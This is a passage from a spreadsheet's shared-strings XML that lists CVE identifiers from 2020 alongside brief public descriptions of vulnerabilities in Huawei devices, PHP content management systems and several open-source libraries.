    <t>Huawei smartphones Honor V20 with versions earlier than 10.0.0.179(C636E3R4P3),versions earlier than 10.0.0.180(C185E3R3P3),versions earlier than 10.0.0.180(C432E10R3P4) have an information disclosure vulnerability. The device does not sufficiently validate the identity of smart wearable device in certain specific scenario, the attacker need to gain certain information in the victim's smartphone to launch the attack, successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-18032</t>
  </si>
  <si>
    <t>Buffer Overflow in Graphviz Graph Visualization Tools from commit ID f8b9e035 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (application crash) by loading a crafted file into the "lib/common/shapes.c" component.</t>
  </si>
  <si>
    <t>CVE-2020-18035</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Jeesns v1.4.2 allows remote attackers to execute arbitrary code by injecting commands into the "CKEditorFuncNum" parameter in the component "CkeditorUploadController.java".</t>
  </si>
  <si>
    <t>CVE-2020-1804</t>
  </si>
  <si>
    <t>Huawei Honor V10 smartphones with versions earlier than 10.0.0.156(C00E156R2P4) has three out of bounds vulnerabilities. Certain driver program does not sufficiently validate certain parameters received, that would lead to several bytes out of bound read. Successful exploit may cause information disclosure or service abnormal. This is 1 out of 3 out of bounds vulnerabilities found. Different than CVE-2020-1805 and CVE-2020-1806.</t>
  </si>
  <si>
    <t>CVE-2020-18048</t>
  </si>
  <si>
    <t>An issue in craigms/main.php of CraigMS 1.0 allows attackers to execute arbitrary commands via a crafted input entered into the DB Name field.</t>
  </si>
  <si>
    <t>CVE-2020-1805</t>
  </si>
  <si>
    <t>Huawei Honor V10 smartphones with versions earlier than 10.0.0.156(C00E156R2P4) has three out of bounds vulnerabilities. Certain driver program does not sufficiently validate certain parameters received, that would lead to several bytes out of bound read. Successful exploit may cause information disclosure or service abnormal. This is 2 out of 3 out of bounds vulnerabilities found. Different than CVE-2020-1804 and CVE-2020-1806.</t>
  </si>
  <si>
    <t>CVE-2020-1806</t>
  </si>
  <si>
    <t>Huawei Honor V10 smartphones with versions earlier than 10.0.0.156(C00E156R2P4) has three out of bounds vulnerabilities. Certain driver program does not sufficiently validate certain parameters received, that would lead to several bytes out of bound read. Successful exploit may cause information disclosure or service abnormal. This is 3 out of 3 out of bounds vulnerabilities found. Different than CVE-2020-1804 and CVE-2020-1805.</t>
  </si>
  <si>
    <t>CVE-2020-18065</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in PopojiCMS 2.0.1 in admin.php?mod=menumanager--------- edit menu.</t>
  </si>
  <si>
    <t>CVE-2020-18066</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerability in ZrLog 2.1.0 via the (1) userName and (2) email parameters in post/addComment.</t>
  </si>
  <si>
    <t>CVE-2020-1807</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with versions earlier than 10.0.0.188(C00E74R3P8) have an improper authorization vulnerability. The software does not properly restrict certain user's modification of certain configuration file, successful exploit could allow the attacker to bypass app lock after a series of operation in ADB mode.</t>
  </si>
  <si>
    <t>CVE-2020-18070</t>
  </si>
  <si>
    <t>Path Traversal in iCMS v7.0.13 allows remote attackers to delete folders by injecting commands into a crafted HTTP request to the "do_del()" method of the component "database.admincp.php".</t>
  </si>
  <si>
    <t>CVE-2020-18077</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the Virtual Path Mapping component of FTPShell v6.83 allows attackers to cause a denial of service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-18078</t>
  </si>
  <si>
    <t>A vulnerability in /include/web_check.php of SEMCMS v3.8 allows attackers to reset the Administrator account's password.</t>
  </si>
  <si>
    <t>CVE-2020-1808</t>
  </si>
  <si>
    <t>Honor 20;HONOR 20 PRO;Honor Magic2;HUAWEI Mate 20 X;HUAWEI P30;HUAWEI P30 Pro;Honor View 20 smartphones with versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.187(C00E60R4P11); versions earlier than 10.0.0.176(C00E60R2P11);9.1.0.135(C00E133R2P1); versions earlier than 10.1.0.123(C431E22R3P5), versions earlier than 10.1.0.126(C636E5R3P4), versions earlier than 10.1.0.160(C00E160R2P11); versions earlier than 10.1.0.126(C185E8R5P1), versions earlier than 10.1.0.126(C636E9R2P4), versions earlier than 10.1.0.160(C00E160R2P8); versions earlier than 10.0.0.179(C636E3R4P3), versions earlier than 10.0.0.180(C185E3R3P3), versions earlier than 10.0.0.180(C432E10R3P4), versions earlier than 10.0.0.181(C675E5R1P2) have an out of bound read vulnerability. The software reads data past the end of the intended buffer. The attacker tricks the user into installing a crafted application, successful exploit may cause information disclosure or service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-18081</t>
  </si>
  <si>
    <t>The checkuser function of SEMCMS 3.8 was discovered to contain a vulnerability which allows attackers to obtain the password in plaintext through a SQL query.</t>
  </si>
  <si>
    <t>CVE-2020-18084</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in yzmCMS v5.2 allows remote attackers to execute arbitrary code by injecting commands into the "referer" field of a POST request to the component "/member/index/login.html" when logging in.</t>
  </si>
  <si>
    <t>CVE-2020-1809</t>
  </si>
  <si>
    <t>HUAWEI Mate 10 smartphones with versions earlier than 10.0.0.143(C00E143R2P4) have an information disclosure vulnerability. The attacker could wake up voice assistant then do a series of crafted voice operation, successful exploit could allow the attacker read certain files without unlock the phone leading to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1810</t>
  </si>
  <si>
    <t>There is a weak algorithm vulnerability in some Huawei products. The affected products use the RSA algorithm in the SSL key exchange algorithm which have been considered as a weak algorithm. Attackers may exploit this vulnerability to leak some information.</t>
  </si>
  <si>
    <t>CVE-2020-18102</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Hotels_Server v1.0 allows remote attackers to execute arbitrary code by injecting crafted commands the data fields in the component "/controller/publishHotel.php".</t>
  </si>
  <si>
    <t>CVE-2020-18106</t>
  </si>
  <si>
    <t>The GET parameter "id" in WMS v1.0 is passed without filtering, which allows attackers to perform SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-1811</t>
  </si>
  <si>
    <t>GaussDB 200 with version of 6.5.1 have a command injection vulnerability. Due to insufficient input validation, remote attackers with low permissions could exploit this vulnerability by sending crafted commands to the affected device. Successful exploit could allow an attacker to execute commands.</t>
  </si>
  <si>
    <t>CVE-2020-18114</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the /uploads/dede component of DedeCMS V5.7SP2 allows attackers to upload a webshell in HTM format.</t>
  </si>
  <si>
    <t>CVE-2020-18116</t>
  </si>
  <si>
    <t>A lack of filtering for searched keywords in the search bar of YouDianCMS 8.0 allows attackers to perform SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-1812</t>
  </si>
  <si>
    <t>HUAWEI P30 smartphones with versions earlier than 10.0.0.173(C00E73R1P11) have an improper authentication vulnerability. Due to improperly validation of certain application, an attacker should trick the user into installing a malicious application to exploit this vulnerability. Successful exploit could allow the attacker to bypass the authentication to perform unauthorized operations.</t>
  </si>
  <si>
    <t>CVE-2020-18121</t>
  </si>
  <si>
    <t>A configuration issue in Indexhibit 2.1.5 allows authenticated attackers to modify .php files, leading to getshell.</t>
  </si>
  <si>
    <t>CVE-2020-18123</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Indexhibit 2.1.5 allows attackers to arbitrarily delete admin accounts.</t>
  </si>
  <si>
    <t>CVE-2020-18124</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) vulnerability in Indexhibit 2.1.5 allows attackers to arbitrarily reset account passwords.</t>
  </si>
  <si>
    <t>CVE-2020-18125</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the /plugin/ajax.php component of Indexhibit 2.1.5 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-18126</t>
  </si>
  <si>
    <t>Multiple stored cross-site scripting (XSS) vulnerabilities in the Sections module of Indexhibit 2.1.5 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-18127</t>
  </si>
  <si>
    <t>An issue in the /config/config.php component of Indexhibit 2.1.5 allows attackers to arbitrarily view files.</t>
  </si>
  <si>
    <t>CVE-2020-18129</t>
  </si>
  <si>
    <t>A CSRF vulnerability in Eyoucms v1.2.7 allows an attacker to add an admin account via login.php.</t>
  </si>
  <si>
    <t>CVE-2020-1813</t>
  </si>
  <si>
    <t>HUAWEI P30 smart phone with versions earlier than 10.1.0.135(C00E135R2P11) have an improper authentication vulnerability. Due to improper authentication of specific interface, in specific scenario attackers could access specific interface without authentication. Successful exploit could allow the attacker to perform unauthorized operations.</t>
  </si>
  <si>
    <t>CVE-2020-1814</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00; Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00 have a Dangling pointer dereference vulnerability. An authenticated attacker may do some special operations in the affected products in some special scenarios to exploit the vulnerability. Due to improper race conditions of different operations, successful exploit will lead to Dangling pointer dereference, causing some service abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-18144</t>
  </si>
  <si>
    <t>SQL Injection Vulnerability in ECTouch v2 via the integral_min parameter in index.php.</t>
  </si>
  <si>
    <t>CVE-2020-18145</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in umeditor v1.2.3 via /public/common/umeditor/php/getcontent.php.</t>
  </si>
  <si>
    <t>CVE-2020-1815</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00; Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00 have a memory leak vulnerability. The software does not sufficiently track and release allocated memory while parse certain message, the attacker sends the message continuously that could consume remaining memory. Successful exploit could cause memory exhaust.</t>
  </si>
  <si>
    <t>CVE-2020-18151</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in ThinkCMF v5.1.0, which can add an admin account.</t>
  </si>
  <si>
    <t>CVE-2020-18155</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Subrion CMS v4.2.1 in the search page if a website uses a PDO connection.</t>
  </si>
  <si>
    <t>CVE-2020-18157</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in MetInfo 6.1.3 via a doaddsave action in admin/index.php.</t>
  </si>
  <si>
    <t>CVE-2020-18158</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in HuCart 5.7.4 via nickname in index.php.</t>
  </si>
  <si>
    <t>CVE-2020-1816</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00; Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00 have a Denial of Service (DoS) vulnerability. Due to improper processing of specific IPSEC packets, remote attackers can send constructed IPSEC packets to affected devices to exploit this vulnerability. Successful exploit could cause the IPSec function of the affected device abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-18164</t>
  </si>
  <si>
    <t>SQL Injection vulnerability exists in tp-shop 2.x-3.x via the /index.php/home/api/shop fBill parameter.</t>
  </si>
  <si>
    <t>CVE-2020-18165</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in LAOBANCMS v2.0 allows remote attackers to execute arbitrary code by injecting commands into the "Website SEO Keywords" field on the page "admin/info.php?shuyu".</t>
  </si>
  <si>
    <t>CVE-2020-18166</t>
  </si>
  <si>
    <t>Unrestricted File Upload in LAOBANCMS v2.0 allows remote attackers to upload arbitrary files by attaching a file with a ".jpg.php" extension to the component "admin/wenjian.php?wj=../templets/pc".</t>
  </si>
  <si>
    <t>CVE-2020-18167</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in LAOBANCMS v2.0 allows remote attackers to execute arbitrary code by injecting commands into the "Homepage Introduction" field of component "admin/info.php?shuyu".</t>
  </si>
  <si>
    <t>CVE-2020-18169</t>
  </si>
  <si>
    <t>** DISPUTED ** A vulnerability in the Windows installer XML (WiX) toolset of TechSmith Snagit 19.1.1.2860 allows attackers to escalate privileges. NOTE: Exploit of the Snagit installer would require the end user to ignore other safety mechanisms provided by the Host OS. See reference document for more details.</t>
  </si>
  <si>
    <t>CVE-2020-1817</t>
  </si>
  <si>
    <t>Huawei PCManager with versions earlier than 10.0.1.36 has a privilege escalation vulnerability. Due to improper permission management of specific files, local attackers with low permissions can inject commands to exploit this vulnerability. Successful exploit may cause privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-18170</t>
  </si>
  <si>
    <t>An issue in the SeChangeNotifyPrivilege component of Abloy Key Manager Version 7.14301.0.0 allows attackers to escalate privileges via a change in permissions.</t>
  </si>
  <si>
    <t>CVE-2020-18171</t>
  </si>
  <si>
    <t>** DISPUTED ** TechSmith Snagit 19.1.0.2653 uses Object Linking and Embedding (OLE) which can allow attackers to obfuscate and embed crafted files used to escalate privileges. NOTE: This implies that Snagit's use of OLE is a security vulnerability unto itself and it is not. See reference document for more details.</t>
  </si>
  <si>
    <t>CVE-2020-18172</t>
  </si>
  <si>
    <t>A code injection vulnerability in the SeDebugPrivilege component of Trezor Bridge 2.0.27 allows attackers to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-18173</t>
  </si>
  <si>
    <t>A DLL injection vulnerability in 1password.dll of 1Password 7.3.712 allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-18174</t>
  </si>
  <si>
    <t>A process injection vulnerability in setup.exe of AutoHotkey 1.1.32.00 allows attackers to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-18175</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Metinfo 6.1.3 via a dosafety_emailadd action in basic.php.</t>
  </si>
  <si>
    <t>CVE-2020-18178</t>
  </si>
  <si>
    <t>Path Traversal in HongCMS v4.0.0 allows remote attackers to view, edit, and delete arbitrary files via a crafted POST request to the component "/hcms/admin/index.php/language/ajax."</t>
  </si>
  <si>
    <t>CVE-2020-18184</t>
  </si>
  <si>
    <t>In PluxXml V5.7,the theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.</t>
  </si>
  <si>
    <t>CVE-2020-18185</t>
  </si>
  <si>
    <t>class.plx.admin.php in PluXml 5.7 allows attackers to execute arbitrary PHP code by modify the configuration file in a linux environment.</t>
  </si>
  <si>
    <t>CVE-2020-18190</t>
  </si>
  <si>
    <t>Bludit v3.8.1 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /admin/ajax/upload-profile-picture.</t>
  </si>
  <si>
    <t>CVE-2020-18191</t>
  </si>
  <si>
    <t>GetSimpleCMS-3.3.15 is affected by directory traversal. Remote attackers are able to delete arbitrary files via /GetSimpleCMS-3.3.15/admin/log.php</t>
  </si>
  <si>
    <t>CVE-2020-18194</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in emlog v6.0.0 allows remote attackers to execute arbitrary code by adding a crafted script as a link to a new blog post.</t>
  </si>
  <si>
    <t>CVE-2020-18195</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in Pluck CMS v4.7.9 allows remote attackers to execute arbitrary code and delete a specific article via the component " /admin.php?action=page."</t>
  </si>
  <si>
    <t>CVE-2020-18198</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in Pluck CMS v4.7.9 allows remote attackers to execute arbitrary code and delete specific images via the component " /admin.php?action=images."</t>
  </si>
  <si>
    <t>CVE-2020-18215</t>
  </si>
  <si>
    <t>Multiple SQL Injection vulnerabilities in PHPSHE 1.7 in phpshe/admin.php via the (1) ad_id, (2) menu_id, and (3) cashout_id parameters, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-18220</t>
  </si>
  <si>
    <t>Weak Encoding for Password in DoraCMS v2.1.1 and earlier allows attackers to obtain sensitive information as it does not use a random salt or IV for its AES-CBC encryption, causes password encrypted for users to be susceptible to dictionary attacks.</t>
  </si>
  <si>
    <t>CVE-2020-18221</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Typora v0.9.65 and earlier allows remote attackers to execute arbitrary code by injecting commands during block rendering of a mathematical formula.</t>
  </si>
  <si>
    <t>CVE-2020-18229</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in PHPMyWind v5.5 allows remote attackers to execute arbitrary code by injecting scripts into the parameter "$cfg_copyright" of component " /admin/web_config.php".</t>
  </si>
  <si>
    <t>CVE-2020-18230</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in PHPMyWind v5.5 allows remote attackers to execute arbitrary code by injecting scripts into the parameter "$cfg_switchshow" of component " /admin/web_config.php".</t>
  </si>
  <si>
    <t>CVE-2020-1825</t>
  </si>
  <si>
    <t>FusionAccess with versions earlier than 6.5.1.SPC002 have a Denial of Service (DoS) vulnerability. Due to insufficient verification on specific input, attackers can exploit this vulnerability by sending constructed messages to the affected device through another device on the same network. Successful exploit could cause affected devices to be abnormal.</t>
  </si>
  <si>
    <t>CVE-2020-18259</t>
  </si>
  <si>
    <t>ED01-CMS v1.0 was discovered to contain a reflective cross-site scripting (XSS) vulnerability in the component sposts.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload inserted into the Post title or Post content fields.</t>
  </si>
  <si>
    <t>CVE-2020-1826</t>
  </si>
  <si>
    <t>Huawei Honor Magic2 mobile phones with versions earlier than 10.0.0.175(C00E59R2P11) have an information leak vulnerability. Due to a module using weak encryption tool, an attacker with the root permission may exploit the vulnerability to obtain some information.</t>
  </si>
  <si>
    <t>CVE-2020-18261</t>
  </si>
  <si>
    <t>An arbitrary file upload vulnerability in the image upload function of ED01-CMS v1.0 allows attackers to execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-18262</t>
  </si>
  <si>
    <t>ED01-CMS v1.0 was discovered to contain a SQL injection in the component cposts.php via the cid parameter.</t>
  </si>
  <si>
    <t>CVE-2020-18263</t>
  </si>
  <si>
    <t>PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability in the component search.php via the search parameter. This vulnerability allows attackers to access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-18264</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in Simple-Log v1.6 allows remote attackers to gain privilege and execute arbitrary code via the component "Simple-Log/admin/admin.php?act=act_edit_member".</t>
  </si>
  <si>
    <t>CVE-2020-18265</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in Simple-Log v1.6 allows remote attackers to gain privilege and execute arbitrary code via the component "Simple-Log/admin/admin.php?act=act_add_member".</t>
  </si>
  <si>
    <t>CVE-2020-18268</t>
  </si>
  <si>
    <t>Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."</t>
  </si>
  <si>
    <t>CVE-2020-1827</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00SPC100; and Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00SPC100 have an information leakage vulnerability. An attacker can exploit this vulnerability by sending specific request packets to affected devices. Successful exploit may lead to information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-1828</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00; and Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00 have an input validation vulnerability where the IPSec module does not validate a field in a specific message. Attackers can send specific message to cause out-of-bound read, compromising normal service.</t>
  </si>
  <si>
    <t>CVE-2020-1829</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30 and V500R001C60SPC500; and Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, and V500R001C60SPC500 have a vulnerability that the IPSec module handles a message improperly. Attackers can send specific message to cause double free memory. This may compromise normal service.</t>
  </si>
  <si>
    <t>CVE-2020-1830</t>
  </si>
  <si>
    <t>Huawei NIP6800 versions V500R001C30, V500R001C60SPC500, and V500R005C00; Secospace USG6600 and USG9500 versions V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, and V500R005C00 have a vulnerability that a memory management error exists when IPSec Module handing a specific message. This causes 1 byte out-of-bound read, compromising normal service.</t>
  </si>
  <si>
    <t>CVE-2020-1831</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smartphones with versions earlier than 10.0.0.195(SP31C00E74R3P8) have an improper authorization vulnerability. The digital balance function does not sufficiently restrict the using time of certain user, successful exploit could allow the user break the limit of digital balance function after a series of operations with a PC.</t>
  </si>
  <si>
    <t>CVE-2020-1832</t>
  </si>
  <si>
    <t>E6878-370 products with versions of 10.0.3.1(H557SP27C233) and 10.0.3.1(H563SP1C00) have a stack buffer overflow vulnerability. The program copies an input buffer to an output buffer without verification. An attacker in the adjacent network could send a crafted message, successful exploit could lead to stack buffer overflow which may cause malicious code execution.</t>
  </si>
  <si>
    <t>CVE-2020-18324</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.</t>
  </si>
  <si>
    <t>CVE-2020-18325</t>
  </si>
  <si>
    <t>Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel.</t>
  </si>
  <si>
    <t>CVE-2020-18326</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in Intelliants Subrion CMS v4.2.1 via the Members administrator function, which could let a remote unauthenticated malicious user send an authorised request to victim and successfully create an arbitrary administrator user.</t>
  </si>
  <si>
    <t>CVE-2020-18327</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in Alfresco Alfresco Community Edition v5.2.0 via the action parameter in the alfresco/s/admin/admin-nodebrowser API. Fixed in v6.2</t>
  </si>
  <si>
    <t>CVE-2020-1833</t>
  </si>
  <si>
    <t>Honor 9X smartphones with versions earlier than 9.1.1.172(C00E170R8P1) have an improper authentication vulnerability. A logic error occurs when handling clock function, an attacker should do a series of crafted operations quickly before the phone is unlocked, successful exploit could allow the attacker to access clock information without unlock the phone.</t>
  </si>
  <si>
    <t>CVE-2020-1834</t>
  </si>
  <si>
    <t>HUAWEI P30 and HUAWEI P30 Pro with versions earlier than 10.1.0.135(C00E135R2P11) and versions earlier than 10.1.0.135(C00E135R2P8) have an insufficient integrity check vulnerability. The system does not check certain software package's integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package to the device.</t>
  </si>
  <si>
    <t>CVE-2020-1835</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 with versions earlier than 10.1.0.126(C00E125R5P3) have an information disclosure vulnerability. A logic judgment error occurs when the system handling Bluetooth connections, an attacker could craft as an authenticated Bluetooth peer to launch the attack. Successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1836</t>
  </si>
  <si>
    <t>HUAWEI P30 with versions earlier than 10.1.0.160(C00E160R2P11) and HUAWEI P30 Pro with versions earlier than 10.1.0.160(C00E160R2P8) have an information disclosure vulnerability. Certain function's default configuration in the system seems insecure, an attacker should craft a WI-FI hotspot to launch the attack. Successful exploit could cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1837</t>
  </si>
  <si>
    <t>ChangXiang 8 Plus with versions earlier than 9.1.0.136(C00E121R1P6T8) have a denial of service vulnerability. The device does not properly handle certain message from base station, the attacker could craft a fake base station to launch the attack. Successful exploit could cause a denial of signal service condition.</t>
  </si>
  <si>
    <t>CVE-2020-1838</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 Pro with versions earlier than 10.1.0.150(C00E136R5P3) have is an improper authentication vulnerability. The device does not sufficiently validate certain credential of user's face, an attacker could craft the credential of the user, successful exploit could allow the attacker to pass the authentication with the crafted credential.</t>
  </si>
  <si>
    <t>CVE-2020-1839</t>
  </si>
  <si>
    <t>HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a race condition vulnerability. There is a timing window exists in which certain pointer members can be modified by another process that is operating concurrently, an attacker should trick the user into running a crafted application with high privilege, successful exploit could cause code execution.</t>
  </si>
  <si>
    <t>CVE-2020-18392</t>
  </si>
  <si>
    <t>Stack overflow vulnerability in parse_array Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-18395</t>
  </si>
  <si>
    <t>A NULL-pointer deference issue was discovered in GNU_gama::set() in ellipsoid.h in Gama 2.04 which can lead to a denial of service (DOS) via segment faults caused by crafted inputs.</t>
  </si>
  <si>
    <t>CVE-2020-1840</t>
  </si>
  <si>
    <t>HUAWEI Mate 20 smart phones with versions earlier than 10.0.0.175(C00E70R3P8) have an insufficient authentication vulnerability. A local attacker with high privilege can execute a specific command to exploit this vulnerability. Successful exploitation may cause information leak and compromise the availability of the smart phones.Affected product versions include: HUAWEI Mate 20 versions Versions earlier than 10.0.0.175(C00E70R3P8)</t>
  </si>
  <si>
    <t>CVE-2020-1841</t>
  </si>
  <si>
    <t>Huawei CloudLink Board version 20.0.0; DP300 version V500R002C00; RSE6500 versions V100R001C00, V500R002C00, and V500R002C00SPC900; and TE60 versions V500R002C00, V600R006C00, V600R006C00SPC200, V600R006C00SPC300, V600R006C10, V600R019C00, and V600R019C00SPC100 have an information leak vulnerability. An unauthenticated, remote attacker can make a large number of attempts to guess information. Successful exploitation may cause information leak.</t>
  </si>
  <si>
    <t>CVE-2020-1842</t>
  </si>
  <si>
    <t>Huawei HEGE-560 version 1.0.1.20(SP2); OSCA-550 and OSCA-550A version 1.0.0.71(SP1); and OSCA-550AX and OSCA-550X version 1.0.0.71(SP2) have an insufficient authentication vulnerability. An attacker can access the device physically and perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker obtain high privilege.</t>
  </si>
  <si>
    <t>CVE-2020-18428</t>
  </si>
  <si>
    <t>tinyexr commit 0.9.5 was discovered to contain an array index error in the tinyexr::SaveEXR component, which can lead to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-1843</t>
  </si>
  <si>
    <t>Huawei HEGE-560 version 1.0.1.20(SP2), OSCA-550 version 1.0.0.71(SP1), OSCA-550A version 1.0.0.71(SP1), OSCA-550AX version 1.0.0.71(SP2), and OSCA-550X version 1.0.0.71(SP2) have an insufficient verification vulnerability. An attacker can perform specific operations to exploit this vulnerability by physical access methods. Successful exploitation may cause the attacker perform an illegal operation.</t>
  </si>
  <si>
    <t>CVE-2020-18430</t>
  </si>
  <si>
    <t>tinyexr 0.9.5 was discovered to contain an array index error in the tinyexr::DecodeEXRImage component, which can lead to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-18438</t>
  </si>
  <si>
    <t>Directory traversal vulnerability in qinggan phpok 5.1, allows attackers to disclose sensitive information, via the title parameter to admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-18439</t>
  </si>
  <si>
    <t>An issue was discoverered in in function edit_save_f in framework/admin/tpl_control.php in qinggan phpok 5.1, allows attackers to write arbitrary files or get a shell.</t>
  </si>
  <si>
    <t>CVE-2020-1844</t>
  </si>
  <si>
    <t>PCManager with versions earlier than 10.0.5.51 have a privilege escalation vulnerability in Huawei PCManager products. An authenticated, local attacker can perform specific operation to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege.</t>
  </si>
  <si>
    <t>CVE-2020-18440</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in framework/init.php in qinggan phpok 5.1, allows attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-18442</t>
  </si>
  <si>
    <t>Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value "zzip_file_read" in the function "unzzip_cat_file".</t>
  </si>
  <si>
    <t>CVE-2020-18445</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in YUNUCMS 1.1.9 via the upurl function in Page.php.</t>
  </si>
  <si>
    <t>CVE-2020-18446</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in YUNUCMS 1.1.9 via the param parameter in the insertContent function in ContentModel.php.</t>
  </si>
  <si>
    <t>CVE-2020-18449</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in UKCMS v1.1.10 via data in the index function in Single.php</t>
  </si>
  <si>
    <t>CVE-2020-1845</t>
  </si>
  <si>
    <t>Huawei PCManager product with versions earlier than 10.0.5.53 have a local privilege escalation vulnerability. An authenticated, local attacker can perform specific operation to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege.</t>
  </si>
  <si>
    <t>CVE-2020-18451</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in DamiCMS v6.0.6 via the title parameter in the doadd function in LabelAction.class.php.</t>
  </si>
  <si>
    <t>CVE-2020-18454</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability in bycms v1.3 via admin.php/systems/index/module_id/70/group_id/1.html.</t>
  </si>
  <si>
    <t>CVE-2020-18455</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in bycms v3.0.4 via the title parameter in the edit function in Document.php.</t>
  </si>
  <si>
    <t>CVE-2020-18456</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in PbootCMS v1.3.7 via the title parameter in the mod function in SingleController.php.</t>
  </si>
  <si>
    <t>CVE-2020-18457</t>
  </si>
  <si>
